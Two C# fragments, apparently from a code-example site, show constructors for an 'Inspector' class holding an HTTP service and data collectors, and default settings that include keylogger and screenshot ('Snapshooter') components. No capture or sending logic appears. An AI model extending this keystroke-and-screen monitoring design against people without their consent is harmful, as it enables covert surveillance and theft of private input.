public Inspector(string sessionId, InspectorSettings settings, IHttpService httpService)
 {
     this.Settings       = settings;
     this.SessionId      = sessionId;
     this.HttpService    = httpService;
     this.DataCollectors = new List <IDataCollector>();
 }
Example #2
0
 static InspectorSettings()
 {
     defaultSettings = new InspectorSettings
     {
         SessionName         = Guid.NewGuid().ToString(),
         KeyloggerSettings   = KeyloggerSettings.DefaultSettings,
         SnapshooterSettings = SnapshooterSettings.DefaultSettings
     };
 }